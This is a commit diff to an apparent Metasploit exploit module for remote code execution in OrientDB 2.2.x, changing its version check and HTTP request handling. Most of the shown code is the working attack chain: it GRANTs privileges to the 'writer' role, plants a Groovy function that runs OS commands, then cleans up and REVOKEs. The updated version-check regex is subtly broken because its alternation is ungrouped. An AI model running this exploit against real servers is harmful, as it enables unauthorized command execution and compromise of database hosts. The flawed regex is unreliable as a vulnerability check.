Orientdb 2.2.x RCE - Fine tune vulnerable version detection; removed redundant uri normalization checking; Swapped send_request_raw for send_request_cgi; using vars_get;

Ricardo Almeida · Ricardo Almeida · commit 6c22f785e9c3 · 2017-07-24T09:52:47.000+01:00
diff --git a/modules/exploits/multi/http/orientdb_exec.rb b/modules/exploits/multi/http/orientdb_exec.rb
@@ -14,7 +14,7 @@ def initialize(info = {})
       'Name'           => 'OrientDB 2.2.x Remote Code Execution',
       'Description'    => %q{
           This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.
-          All versions from 2.2.1 up to 2.2.22 should be vulnerable.
+          All versions from 2.2.2 up to 2.2.22 should be vulnerable.
       },
       'Author'  =>
         [
@@ -51,9 +51,8 @@ def initialize(info = {})
   def check
     uri = target_uri
     uri.path = normalize_uri(uri.path)
-    uri.path << "/" if uri.path[-1, 1] != "/"
-    res = send_request_raw({'uri' => "#{uri.path}listDatabases"})
-    if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\./
+    res = send_request_cgi({'uri' => "#{uri.path}listDatabases"})
+    if res and res.code == 200 and res.headers['Server'] =~ /OrientDB Server v\.2\.2\.[2-9]|1[0-9]|2[0-2]/
       print_good("Version: #{res.headers['Server']}")
       return Exploit::CheckCode::Vulnerable
     else
@@ -68,11 +67,12 @@ def http_send_command(cmd, opts = {})
     request_parameters = {
       'method'    => 'POST',
       'uri'       => normalize_uri(@uri.path, "/document/#{opts}/-1:-1"),
+      'encode_params' => false,
       'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
       'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
       'data' => "{\"@class\":\"ofunction\",\"@version\":0,\"@rid\":\"#-1:-1\",\"idempotent\":null,\"name\":\"#{func_name}\",\"language\":\"groovy\",\"code\":\"#{java_craft_runtime_exec(cmd)}\",\"parameters\":null}"
     }
-    res = send_request_raw(request_parameters)
+    res = send_request_cgi(request_parameters)
     if not (res and res.code == 201)
       begin
         json_body = JSON.parse(res.body)
@@ -85,11 +85,12 @@ def http_send_command(cmd, opts = {})
     request_parameters = {
       'method'    => 'POST',
       'uri'       => normalize_uri(@uri.path, "/function/#{opts}/#{func_name}"),
+      'encode_params' => false,
       'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
       'headers' => { 'Accept' => '*/*', 'Content-Type' => 'application/json;charset=UTF-8' },
       'data' => ""
     }
-    req = send_request_raw(request_parameters)
+    req = send_request_cgi(request_parameters)
     if not (req and req.code == 200)
       begin
         json_body = JSON.parse(res.body)
@@ -112,11 +113,12 @@ def http_send_command(cmd, opts = {})
     request_parameters = {
       'method'    => 'DELETE',
       'uri'       => normalize_uri(@uri.path, "/document/#{opts}/#{func_id}"),
+      'encode_params' => false,
       'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
       'headers' => { 'Accept' => '*/*' },
       'data' => ""
     }
-    rer = send_request_raw(request_parameters)
+    rer = send_request_cgi(request_parameters)
     if not (rer and rer.code == 204)
       begin
         json_body = JSON.parse(res.body)
@@ -157,8 +159,7 @@ def execute_command(cmd, opts = {})
     vprint_status("Attempting to execute: #{cmd}")
     @uri = target_uri
     @uri.path = normalize_uri(@uri.path)
-    @uri.path << "/" if @uri.path[-1, 1] != "/"
-    res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
+    res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
     if res && res.code == 200 && res.body.length > 0
       begin
         json_body = JSON.parse(res.body)["databases"]
@@ -198,8 +199,7 @@ def linux_stager
   def exploit
     @uri = target_uri
     @uri.path = normalize_uri(@uri.path)
-    @uri.path << "/" if @uri.path[-1, 1] != "/"
-    res = send_request_raw({'uri' => "#{@uri.path}listDatabases"})
+    res = send_request_cgi({'uri' => "#{@uri.path}listDatabases"})
     if res && res.code == 200 && res.body.length > 0
       begin
         json_body = JSON.parse(res.body)["databases"]
@@ -219,12 +219,14 @@ def exploit
       items.each do |item|
        request_parameters = {
         'method'    => 'POST',
-        'uri'       => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20?format=rid,type,version,class,graph"),
+        'uri'       => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
+        'vars_get' => { 'format' => 'rid,type,version,class,graph' },
+        'encode_params' => false,
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers' => { 'Accept' => '*/*' },
         'data' => "GRANT #{priv} ON #{item} TO writer"
        }
-       res = send_request_raw(request_parameters)
+       res = send_request_cgi(request_parameters)
       end
     end
     # Exploit
@@ -245,12 +247,14 @@ def exploit
       items.each do |item|
        request_parameters = {
         'method'    => 'POST',
-        'uri'       => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20?format=rid,type,version,class,graph"),
+        'uri'       => normalize_uri(@uri.path, "/command/#{targetdb}/sql/-/20"),
+        'vars_get' => { 'format' => 'rid,type,version,class,graph' },
+        'encode_params' => false,
         'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
         'headers' => { 'Accept' => '*/*' },
         'data' => "REVOKE #{priv} ON #{item} FROM writer"
        }
-       res = send_request_raw(request_parameters)
+       res = send_request_cgi(request_parameters)
       end
     end
    end
